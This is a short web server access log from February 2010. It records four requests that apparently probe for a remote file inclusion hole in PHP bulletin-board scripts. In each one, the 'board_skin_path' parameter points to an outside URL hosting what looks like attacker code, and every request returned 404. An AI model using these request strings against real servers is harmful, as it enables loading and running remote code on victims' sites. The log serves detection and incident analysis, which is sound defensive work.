208.93.149.176 - - [08/Feb/2010:11:01:57 -0800] "GET /logs/access_100126.log%20%20//bbs/delete_comment.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:11:03:48 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:11:03:48 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:11:03:53 -0800] "GET /logs/access_100129.log%20%20//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
